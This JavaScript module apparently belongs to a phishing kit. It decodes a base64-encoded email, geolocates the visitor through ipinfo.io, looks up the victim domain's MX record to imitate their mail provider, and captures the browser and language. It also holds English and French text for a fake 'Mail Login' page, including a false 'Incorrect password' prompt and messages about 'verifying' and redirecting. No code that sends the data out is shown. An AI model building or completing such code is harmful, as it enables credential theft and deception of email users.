export const handleBase64Data = (string) => {
  try {
    return atob(string);
  } catch (error) {
    return string;
  }
};

export const getVisitorIP = async () => {
  try {
    const response = await fetch('https://ipinfo.io/json');
    const data = await response.json();
    return [data.ip, data.country, data.region, data.city];
  } catch (error) {
    return ["N/A", "N/A", "N/A", "N/A"];
  }
};

export const getMXRecord = async (domain) => {
  try {
    const response = await fetch(`https://dns.google/resolve?name=${domain}&type=MX`);
    const data = await response.json();
    if (data.Answer && data.Answer.length > 0) {
      return data.Answer[0].data;
    }
    return "No MX record found";
  } catch (error) {
    return "Error retrieving MX record";
  }
};

export const GetBrowserandLanguage = () => {
  return [
    navigator.userAgent,
    navigator.language || navigator.userLanguage
  ];
};

export const getLocalizedLanguage = (langCode) => {
  const languages = {
    'en': {
      error: "Please enter a valid email address",
      lessThan4: "Password must be at least 4 characters",
      msg: "Incorrect password. Please try again.",
      submitBtn: "Sign In",
      secLgSs: "Secure login session",
      frgPsw: "Forgot password?",
      copy: "© 2025 Secure Login. All rights reserved.",
      emlTxt: "Email address",
      pswTxt: "Password",
      emlLogin: "Mail Login",
      mail: "Mail",
      verifyingText: "Verifying...",
      yourEmail: "Your email has been verified successfully.",
      success: "You will be redirected shortly."
    },
    'fr': {
      error: "Veuillez saisir une adresse e-mail valide",
      lessThan4: "Le mot de passe doit contenir au moins 4 caractères",
      msg: "Mot de passe incorrect. Veuillez réessayer.",
      submitBtn: "Se connecter",
      secLgSs: "Session de connexion sécurisée",
      frgPsw: "Mot de passe oublié?",
      copy: "© 2025 Connexion sécurisée. Tous droits réservés.",
      emlTxt: "Adresse e-mail",
      pswTxt: "Mot de passe",
      emlLogin: "Connexion Mail",
      mail: "Mail",
      verifyingText: "Vérification en cours...",
      yourEmail: "Votre adresse e-mail a été vérifiée avec succès.",
      success: "Vous serez redirigé sous peu."
    },
    // Add other languages as needed
  };
  return languages[langCode] || languages['en'];
};